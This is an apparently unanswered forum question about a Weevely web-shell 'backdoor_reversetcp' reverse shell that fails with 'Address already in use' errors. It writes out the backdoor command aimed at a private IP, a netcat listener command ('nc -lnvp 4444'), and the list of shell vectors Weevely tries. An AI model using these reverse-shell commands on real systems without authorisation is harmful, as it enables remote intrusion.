0

I'm trying to reverse shell using module backdoor_reversetcp

backdoor_reversetcp 172.16.1.89 4444 - Connecting to my Machine
nc -lnvp 4444 - Waiting Shell

Weevely run 8 vector netcat_bsd,netcat,python,devtcp,perl,ruby,telnet,python_pty, so, running the command I receive this output

Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'
Error binding socket: '[Errno 98] Address already in use'

That is funny part, if I remove the listening port 4444 to another one 4445, once I have no Listening port, the output is blank. It is normal? If I try from another machine is fine, works. But from that specific machine, I cannot do that.

0 Answers0